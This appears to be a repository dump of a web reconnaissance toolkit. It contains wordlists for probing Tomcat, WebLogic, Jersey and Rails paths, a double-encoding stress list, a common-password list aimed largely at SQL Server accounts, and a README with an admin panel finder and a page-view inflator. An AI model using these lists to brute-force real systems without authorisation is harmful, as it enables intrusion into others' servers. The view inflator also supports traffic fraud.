140 | itzultzaile 141 | jaitsi 142 | jarraitu 143 | jaso 144 | jator 145 | kendu 146 | konexioak 147 | kurtso 148 | laburpena 149 | lagin 150 | lagundu 151 | lantegi 152 | leiho 153 | leku 154 | liburu 155 | loturak 156 | makusi 157 | marraztu 158 | media 159 | mezu 160 | mezuak 161 | moztu 162 | mugitu 163 | norabide 164 | ohar 165 | oharra 166 | ohartu 167 | on 168 | ondo 169 | ordaindu 170 | osatu 171 | pagatu 172 | piztu 173 | politika 174 | probatu 175 | proiektua 176 | saiatu 177 | sail 178 | saio 179 | saioa 180 | saldu 181 | sarrera 182 | sartu 183 | seilu 184 | sistema 185 | sortu 186 | sustapena 187 | talde 188 | taula 189 | teknologia 190 | transmititu 191 | tresna 192 | txartel 193 | txostena 194 | utzi 195 | web 196 | zulo 197 | zuzen 198 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/tomcat.txt: -------------------------------------------------------------------------------- 1 | ROOT 2 | add 3 | balancer 4 | dav 5 | deploy 6 | examples 7 | examples/jsp/index.html 8 | examples/jsp/snp/snoop.jsp 9 | examples/jsp/source.jsp 10 | examples/servlet/HelloWorldExample 11 | examples/servlet/SnoopServlet 12 | examples/servlet/TroubleShooter 13 | examples/servlet/default/jsp/snp/snoop.jsp 14 | examples/servlet/default/jsp/source.jsp 15 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 16 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 17 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 19 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 20 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 21 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 22 | examples/servlet/snoop 23 | examples/servlets/index.html 24 | host-manager 25 | host-manager/add 26 | host-manager/host-manager.xml 27 | host-manager/html/* 28 | host-manager/list 29 | host-manager/remove 30 | host-manager/start 31 | host-manager/stop 32 | html/* 33 | install 34 | j4p 35 | jmxproxy/* 36 | jsp-examples 37 | list 38 | manager 39 | manager/deploy 40 | manager/html 41 | manager/html/* 42 | manager/install 43 | manager/jmxproxy 44 | manager/jmxproxy/* 45 | manager/list 46 | manager/manager.xml 47 | manager/reload 48 | manager/remove 49 | manager/resources 50 | manager/roles 51 | manager/save 52 | manager/serverinfo 53 | manager/sessions 54 | manager/start 55 | manager/status.xsd 56 | manager/status/* 57 | manager/stop 58 | manager/undeploy 59 | reload 60 | remove 61 | resources 62 | roles 63 | save 64 | serverinfo 65 | servlet/default/ 66 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 67 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 68 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 69 | servlet/org.apache.catalina.servlets.DefaultServlet/ 70 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 71 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 72 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 73 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 74 | servlet/org.apache.catalina.servlets.ManagerServlet 75 | servlet/org.apache.catalina.servlets.SnoopAllServlet 76 | servlet/org.apache.catalina.servlets.WebdavServlet/ 77 | servlets-examples 78 | sessions 79 | start 80 | status/* 81 | stop 82 | tomcat-docs 83 | undeploy 84 | webdav 85 | webdav/index.html 86 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 87 | webdav/servlet/webdav/ 88 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/jersey.txt: -------------------------------------------------------------------------------- 1 | JAXBElement 2 | SimpleServlet/resources/start 3 | XmlRootElement 4 | XmlType 5 | aircrafts 6 | application.wadl 7 | assembly.xml 8 | atom/application.wadl 9 | atom/collection 10 | atompub-contacts-client 11 | atompub-contacts-models 12 | atompub-contacts-server 13 | bookmark 14 | bookmark-em 15 | bookmarks 16 | bookstore 17 | changes 18 | changes/latest 19 | collection 20 | contacts 21 | containers 22 | count 23 | data 24 | ejb 25 | emptyArrayResource 26 | entity-provider 27 | extended-wadl-webapp 28 | extended-wadl-webapp/application.wadl 29 | flights 30 | form 31 | form/colours 32 | generate-wadl 33 | groovy 34 | helloworld 35 | helloworld-webapp 36 | helloworld-webapp/helloworld 37 | https-clientserver-grizzly 38 | https-server-glassfish 39 | httpsBasicAuth-webapp/helloworld 40 | item 41 | item/content 42 | item/content/1 43 | jacksonjsonprovider 44 | jacksonjsonprovider/application.wadl 45 | jacksonjsonprovider/emptyArrayResource 46 | jacksonjsonprovider/nonJAXBResource 47 | jaxb 48 | jaxb/JAXBElement 49 | jaxb/XmlRootElement 50 | jaxb/XmlType 51 | jaxb/array/XmlRootElement 52 | jaxb/array/XmlType 53 | jaxb/collection/XmlRootElement 54 | jaxb/collection/XmlType 55 | jcdi-beans-webapp 56 | jcdi-beans-webapp/ejb/stateless 57 | jcdi-beans-webapp/jcdibean/dependent/per-request 58 | jcdi-beans-webapp/jcdibean/dependent/singleton 59 | jcdi-beans-webapp/jcdibean/per-request 60 | jcdi-beans-webapp/jcdibean/singleton 61 | jcdibean 62 | jersey-autowired 63 | jersey-ejb 64 | jersey-ejb/app/messages 65 | jersey-ejb/app/messages/1 66 | jmaki-backend 67 | json-from-jaxb 68 | jsonfromjaxb/aircrafts 69 | jsonfromjaxb/application.wadl 70 | jsonfromjaxb/flights 71 | jsonp 72 | jsonp/changes 73 | managed-beans-webapp 74 | mandel 75 | mandelbrot 76 | markup 77 | nonJAXBResource 78 | occ/item 79 | occ/item/content/0 80 | optimistic-concurrency 81 | per-request 82 | pom.xml 83 | printers 84 | printers/ids/1 85 | printers/jMakiTable 86 | printers/jMakiTree 87 | printers/list 88 | properties 89 | resources/application.wadl 90 | resources/form 91 | resources/form/colours 92 | resources/start 93 | scala-helloworld-webapp 94 | service 95 | simple-atom-server 96 | simple-console 97 | simple-servlet 98 | singleton 99 | sparklines 100 | sparklines/discrete 101 | spring-annotations 102 | spring-aop 103 | spring-aop/subresource 104 | spring-autowired 105 | spring-resourced 106 | spring/jersey-autowired 107 | spring/spring-aop 108 | spring/spring-aop/subresource 109 | spring/spring-autowired 110 | spring/spring-resourced 111 | start 112 | stateless 113 | storage-service 114 | storage/containers 115 | storage/containers/quotes 116 | time 117 | users 118 | users/ 119 | users/1 120 | users/1/bookmarks 121 | users/1/bookmarks/1 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/ror.txt: -------------------------------------------------------------------------------- 1 | .gitignore 2 | Gemfile 3 | README 4 | README.rdoc 5 | Rakefile 6 | app 7 | app/assets/images/rails.png 8 | app/assets/javascripts/application.js 9 | app/assets/stylesheets/application.css 10 | app/controllers 11 | app/controllers/admin_controller.rb 12 | app/controllers/application.rb 13 | app/controllers/application_controller.rb 14 | app/helpers/application_helper.rb 15 | app/mailers 16 | app/mailers/.gitkeep 17 | app/models 18 | app/models/.gitkeep 19 | app/views/layouts/application.html.erb 20 | config 21 | config.ru 22 | config/application.rb 23 | config/boot.rb 24 | config/database.yml 25 | config/deploy.rb 26 | config/environment.rb 27 | config/environments 28 | config/environments/development.rb 29 | config/environments/production.rb 30 | config/environments/test.rb 31 | config/initializers 32 | config/initializers/backtrace_silencers.rb 33 | config/initializers/inflections.rb 34 | config/initializers/mime_types.rb 35 | config/initializers/secret_token.rb 36 | config/initializers/session_store.rb 37 | config/initializers/wrap_parameters.rb 38 | config/locales 39 | config/locales/en.yml 40 | config/routes.rb 41 | core 42 | create 43 | db 44 | db/seeds.rb 45 | dispatch.cgi 46 | dispatch.fcgi 47 | dispatch.rb 48 | doc 49 | doc/README_FOR_APP 50 | lib 51 | lib/assets 52 | lib/assets/.gitkeep 53 | lib/tasks 54 | lib/tasks/.gitkeep 55 | log 56 | log/.gitkeep 57 | log/development.log 58 | log/production.log 59 | log/server.log 60 | log/test.log 61 | public 62 | public/404.html 63 | public/422.html 64 | public/500.html 65 | public/favicon.ico 66 | public/index.html 67 | public/robots.txt 68 | rails 69 | rails/info 70 | rails/info/properties 71 | script 72 | script/about 73 | script/console 74 | script/dbconsole 75 | script/destroy 76 | script/generate 77 | script/performance 78 | script/performance/benchmarker 79 | script/performance/profiler 80 | script/performance/request 81 | script/plugin 82 | script/process 83 | script/process/inspector 84 | script/process/reaper 85 | script/process/spawner 86 | script/rails 87 | script/runner 88 | script/server 89 | stdlib 90 | test/fixtures 91 | test/fixtures/.gitkeep 92 | test/functional 93 | test/functional/.gitkeep 94 | test/integration 95 | test/integration/.gitkeep 96 | test/performance/browsing_test.rb 97 | test/test_helper.rb 98 | test/unit 99 | test/unit/.gitkeep 100 | tmp/cache 101 | tmp/cache/assets 102 | vendor/assets/javascripts 103 | vendor/assets/javascripts/.gitkeep 104 | vendor/assets/stylesheets 105 | vendor/assets/stylesheets/.gitkeep 106 | vendor/plugins 107 | vendor/plugins/.gitkeep 108 | app/views/home/index.html.erb 109 | assets/application.css 110 | assets/jquery.js 111 | assets/application.js 112 | assets/home.css 113 | assets/home.js 114 | posts 115 | posts/new 116 | posts/1/edit 117 | posts.json 118 | javascripts/application.js 119 | javascripts/prototype.js 120 | stylesheets/application.css 121 | images/rails.png 122 | -------------------------------------------------------------------------------- /wordlists/dirb/stress/doble_uri_hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 | %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | -------------------------------------------------------------------------------- /wordlists/wfuzz/stress/doble_uri_hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 | %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | -------------------------------------------------------------------------------- /wordlists/fasttrack.txt: -------------------------------------------------------------------------------- 1 | Spring2017 2 | Spring2016 3 | Spring2015 4 | Spring2014 5 | Spring2013 6 | spring2017 7 | spring2016 8 | spring2015 9 | spring2014 10 | spring2013 11 | Summer2017 12 | Summer2016 13 | Summer2015 14 | Summer2014 15 | Summer2013 16 | summer2017 17 | summer2016 18 | summer2015 19 | summer2014 20 | summer2013 21 | Autumn2017 22 | Autumn2016 23 | Autumn2015 24 | Autumn2014 25 | Autumn2013 26 | autumn2017 27 | autumn2016 28 | autumn2015 29 | autumn2014 30 | autumn2013 31 | Winter2017 32 | Winter2016 33 | Winter2015 34 | Winter2014 35 | Winter2013 36 | winter2017 37 | winter2016 38 | winter2015 39 | winter2014 40 | winter2013 41 | P@55w0rd 42 | P@ssw0rd! 43 | P@55w0rd! 44 | sqlsqlsqlsql 45 | SQLSQLSQLSQL 46 | Welcome123 47 | Welcome1234 48 | Welcome1212 49 | PassSql12 50 | network 51 | networking 52 | networks 53 | test 54 | testtest 55 | testing 56 | testing123 57 | testsql 58 | test-sql3 59 | sqlsqlsqlsqlsql 60 | bankbank 61 | default 62 | test 63 | testing 64 | password2 65 | 66 | password 67 | Password1 68 | Password1! 69 | P@ssw0rd 70 | password12 71 | Password12 72 | security 73 | security1 74 | security3 75 | secuirty3 76 | complex1 77 | complex2 78 | complex3 79 | sqlserver 80 | sql 81 | sqlsql 82 | password1 83 | password123 84 | complexpassword 85 | database 86 | server 87 | changeme 88 | change 89 | sqlserver2000 90 | sqlserver2005 91 | Sqlserver 92 | SqlServer 93 | Password1 94 | Password2 95 | P@ssw0rd 96 | P@ssw0rd! 97 | P@55w0rd! 98 | P@ssword! 99 | Password! 100 | password! 101 | sqlsvr 102 | sqlaccount 103 | account 104 | sasa 105 | sa 106 | administator 107 | pass 108 | sql 109 | microsoft 110 | sqlserver 111 | sa 112 | hugs 113 | sasa 114 | welcome 115 | welcome1 116 | welcome2 117 | march2011 118 | sqlpass 119 | sqlpassword 120 | guessme 121 | bird 122 | P@55w0rd! 123 | test 124 | dev 125 | devdev 126 | devdevdev 127 | qa 128 | god 129 | admin 130 | adminadmin 131 | admins 132 | goat 133 | sysadmin 134 | water 135 | dirt 136 | air 137 | earth 138 | company 139 | company1 140 | company123 141 | company1! 142 | company! 143 | secret 144 | secret! 145 | secret123 146 | secret1212 147 | secret12 148 | secret1! 149 | sqlpass123 150 | Summer2013 151 | Summer2012 152 | Summer2011 153 | Summer2010 154 | Summer2009 155 | Summer2008 156 | Winter2013 157 | Winter2012 158 | Winter2011 159 | Winter2010 160 | Winter2009 161 | Winter2008 162 | summer2013 163 | summer2012 164 | summer2011 165 | summer2010 166 | summer2009 167 | summer2008 168 | winter2013 169 | winter2012 170 | winter2011 171 | winter2010 172 | winter2009 173 | winter2008 174 | 123456 175 | abcd123 176 | abc 177 | burp 178 | private 179 | unknown 180 | wicked 181 | alpine 182 | trust 183 | microsoft 184 | sql2000 185 | sql2003 186 | sql2005 187 | sql2008 188 | vista 189 | xp 190 | nt 191 | 98 192 | 95 193 | 2003 194 | 2008 195 | someday 196 | sql2010 197 | sql2011 198 | sql2009 199 | complex 200 | goat 201 | changelater 202 | rain 203 | fire 204 | snow 205 | unchanged 206 | qwerty 207 | 12345678 208 | football 209 | baseball 210 | basketball 211 | abc123 212 | 111111 213 | 1qaz2wsx 214 | dragon 215 | master 216 | monkey 217 | letmein 218 | login 219 | princess 220 | solo 221 | qwertyuiop 222 | starwars 223 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/weblogic.txt: -------------------------------------------------------------------------------- 1 | * 2 | *.gif 3 | *.gif/ 4 | *.html 5 | *.jsp 6 | *.jsp/ 7 | *.jws 8 | *.shtml/ 9 | AdminCaptureRootCA 10 | AdminClients 11 | AdminConnections 12 | AdminEvents 13 | AdminJDBC 14 | AdminLicense 15 | AdminMain 16 | AdminProps 17 | AdminRealm 18 | AdminThreads 19 | AdminVersion 20 | BizTalkServer 21 | Bootstrap 22 | Certificate 23 | Classpath/ 24 | ConsoleHelp/ 25 | ConsoleHelp 26 | DefaultWebApp 27 | HTTPClntClose 28 | HTTPClntLogin 29 | HTTPClntRecv 30 | HTTPClntSend 31 | LogfileSearch 32 | LogfileTail 33 | Login.jsp 34 | MANIFEST.MF 35 | META-INF 36 | SimpappServlet 37 | StockServlet 38 | T3AdminMain 39 | UniversityServlet 40 | WEB-INF 41 | WEB-INF./web.xml 42 | WEB-INF/web.xml 43 | WLDummyInitJVMIDs 44 | WebServiceServlet 45 | _tmp_war 46 | _tmp_war_DefaultWebApp 47 | a2e2gp2r2/x.jsp 48 | actions 49 | admin/login.do 50 | applet 51 | applications 52 | authenticatedy 53 | bea_wls_internal/classes/ 54 | bea_wls_internal/classes/ 55 | bea_wls_internal/WebServiceServlet 56 | bea_wls_internal/getior 57 | bea_wls_internal 58 | bea_wls_internal/HTTPClntSend 59 | bea_wls_internal/HTTPClntRecv 60 | bea_wls_internal/iiop/ClientSend 61 | bea_wls_internal/iiop/ClientRecv 62 | bea_wls_internal/iiop/ClientLogin 63 | bea_wls_internal/WLDummyInitJVMIDs 64 | bea_wls_internal/a2e2gp2r2/x.jsp 65 | bea_wls_internal/psquare/x.jsp 66 | bea_wls_internal/iiop/ClientClose 67 | beanManaged 68 | certificate 69 | classes 70 | classes/ 71 | com 72 | common 73 | config 74 | console 75 | cookies 76 | default 77 | docs51 78 | domain 79 | drp-exports 80 | drp-publish 81 | dummy 82 | e2ePortalProject/Login.portal 83 | ejb 84 | ejbSimpappServlet 85 | error 86 | examplesWebApp/EJBeanManagedClient.jsp 87 | examplesWebApp/WebservicesEJB.jsp 88 | examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml 89 | examplesWebApp/index.jsp 90 | examplesWebApp/InteractiveQuery.jsp 91 | examplesWebApp/SessionServlet 92 | fault 93 | file 94 | file/ 95 | fileRealm 96 | fileRealm.properties 97 | getior 98 | graphics 99 | helloKona 100 | helloWorld 101 | iiop/ClientClose 102 | iiop/ClientRecv 103 | iiop/ClientLogin 104 | iiop/ClientSend 105 | images 106 | index 107 | index.jsp 108 | internal 109 | jmssender 110 | jmstrader 111 | jspbuild 112 | jwsdir 113 | login.jsp 114 | manifest.mf 115 | mapping 116 | mydomain 117 | myservlet 118 | page 119 | patient/login.do 120 | patient/register.do 121 | phone 122 | physican/login.do 123 | portalAppAdmin/login.jsp 124 | properties 125 | proxy 126 | psquare/x.jsp 127 | public_html 128 | servlet 129 | servletimages 130 | servlets/ 131 | session 132 | simpapp 133 | simple 134 | simpleFormServlet 135 | snoop 136 | survey 137 | system 138 | taglib-uri 139 | uddi 140 | uddi/uddilistener 141 | uddiexplorer 142 | uddilistener 143 | utils 144 | web 145 | web.xml 146 | weblogic 147 | weblogic.properties 148 | weblogic.xml 149 | webservice 150 | webshare 151 | wl_management_internal2/FileDistribution 152 | wl_management_internal2/Bootstrap 153 | wl_management_internal2/Admin 154 | wl_management_internal2/wl_management 155 | wl_management_internal1/LogfileTail 156 | wl_management_internal1/LogfileSearch 157 | wl_management_internal1 158 | wl_management 159 | wl_management_internal2 160 | wliconsole 161 | wlserver 162 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🍀   XCTR Hacking Tools   🍀 2 | 3 | 4 | 5 | 6 | 7 | #### Version 1.0.0 8 | All in one tools for **Information Gathering**. 9 | 10 | Instagram: [Capture the Root](https://www.instagram.com/capturetheroot/) 11 | ## 🖼️ Screenshots 🖼️ 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | ## 📹 How to use 📹 22 | [![How to use XCTR Tools](https://i.imgur.com/SqU3UN5.png)](https://www.youtube.com/watch?v=qeiVRP1gUCA) 23 | 24 | Click on the image... 25 | 26 | Thank you **Jolanda de Koff**. 27 | 28 | You can visit https://hackingpassion.com for a lot of amazing articles. 29 | 30 | 31 | ## 📒 Read Me 📒 32 | 33 | Initially, **you need to create a project** where you will save everything. 34 | 35 | All of the collected information is saved as **"project-name"** in results directory. 36 | 37 | ⚙️ You can update user agent and proxy information in the settings section and also update url, proxy, project name, wordlist, thread numbers. 38 | 39 | 40 | ## 🧰 Features 🧰 41 | This tool **include:** 42 | + Dork Finder 43 | + Admin Panel Finder 44 | + Cms Finder 45 | + Ip History 46 | + Reverse Ip 47 | + Page Viewer 48 | + Proxy Finder 49 | 50 | 51 | ## 📀 Installation 📀 52 | ### Installation with requirements.txt 53 | 54 | ```bash 55 | git clone https://github.com/capture0x/XCTR-Hacking-Tools/ 56 | cd xctr-hacking-tools 57 | pip3 install -r requirements.txt 58 | ``` 59 | 60 | ## Usage 61 | 62 | ```bash 63 | python3 xctr.py 64 | Update proxies from settings menu (9 than 3) 65 | ``` 66 | 67 | **All results save in results/project-name.** 68 | 69 | ### Dork Finder 70 | The dork finder have 2 section. Bing and yandex. 71 | 72 | e.g: 73 | ``` 74 | *.php?id= 75 | ``` 76 | 77 | ### Admin Panel Finder 78 | 79 | In this section, firstly need choose a wordlist for scanning. 80 | 81 | Press 2 to change wordlist and login. 82 | 83 | Url should be **https://targetsite.com/** (http or s and / symbol at the end of the url.) 84 | 85 | If scanning is slow you will update the proxies.(Press 3 to update) 86 | 87 | ### Cms Finder 88 | 89 | You'll find cms version from meta name. 90 | 91 | ### Ip History 92 | 93 | This tool displays and save the ip history of the domain. 94 | 95 | e.g usage: 96 | ``` 97 | targetsite.com 98 | ``` 99 | 100 | ### Reverse Ip 101 | 102 | With this tool, you can find domains on server. 103 | 104 | e.g usage: 105 | ``` 106 | 212.57.147.54 107 | ``` 108 | 109 | ### Page Viewer 110 | 111 | You can increase the number of page views of the target site. 112 | 113 | e.g usage: 114 | ``` 115 | https://targetsite.com 116 | ``` 117 | 118 | ### Proxy Finder 119 | 120 | This tool, find proxies on free-proxy-list.net and updates proxy.txt on main directory. 121 | 122 | 123 | ## Known Issues 124 | 125 | -- 126 | 127 | ## Bugs and enhancements 128 | 129 | For bug reports or enhancements, please open an [issue](https://github.com/capture0x/XCTR-Hacking-Tools/issues) here. 130 | 131 | 132 | **Copyright 2020** 133 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/spanish.txt: -------------------------------------------------------------------------------- 1 | abajo 2 | acceso 3 | acciones 4 | actividad 5 | actividades 6 | actual 7 | administracion 8 | adminsitradores 9 | agenda 10 | alias 11 | almacen 12 | antiguo 13 | aplicacion 14 | archivar 15 | archivo 16 | archivos 17 | area 18 | arriba 19 | articulo 20 | articulos 21 | auditoria 22 | ayuda 23 | banca 24 | banco 25 | base 26 | bbdd 27 | bdatos 28 | bolsa 29 | borrar 30 | boton 31 | botones 32 | buscador 33 | buscar 34 | buzon 35 | buzones 36 | cabecera 37 | caja 38 | cajon 39 | carga 40 | cargar 41 | carpeta 42 | carta 43 | cas 44 | cast 45 | castellano 46 | catalogo 47 | catalogos 48 | centro 49 | centros 50 | certificado 51 | certificados 52 | cifrado 53 | clave 54 | claves 55 | cliente 56 | clientes 57 | codigo 58 | coger 59 | coleccion 60 | colecciones 61 | comercio 62 | comercios 63 | componentes 64 | compra 65 | compras 66 | comun 67 | comunes 68 | comunicacion 69 | comunicaciones 70 | conecta 71 | configuracion 72 | contador 73 | contenedor 74 | contenido 75 | contenidos 76 | copia 77 | correo 78 | cs 79 | cuenta 80 | cuentas 81 | dato 82 | datos 83 | dejar 84 | demanda 85 | derecha 86 | desarrollo 87 | descarga 88 | descargas 89 | directorio 90 | diseno 91 | documentacion 92 | documento 93 | documentos 94 | ejemplo 95 | ejemplos 96 | empresa 97 | empresas 98 | enlace 99 | enlaces 100 | entidades 101 | entorno 102 | entornos 103 | entrada 104 | entregar 105 | entregas 106 | envia 107 | es 108 | escuela 109 | esp 110 | espanol 111 | estadisticas 112 | externos 113 | ficha 114 | fichas 115 | fichero 116 | ficheros 117 | forma 118 | formulario 119 | formularios 120 | foro 121 | foros 122 | forum 123 | foto 124 | fotos 125 | frontal 126 | general 127 | gestion 128 | guardar 129 | herramientas 130 | id 131 | imagen 132 | imagenes 133 | implantacion 134 | indice 135 | informacion 136 | ingresa 137 | ingreso 138 | inicio 139 | instalacion 140 | investigado 141 | invitado 142 | invitados 143 | izquierda 144 | juego 145 | juegos 146 | leer 147 | letras 148 | libros 149 | listar 150 | llamada 151 | llamadas 152 | llave 153 | llaves 154 | local 155 | 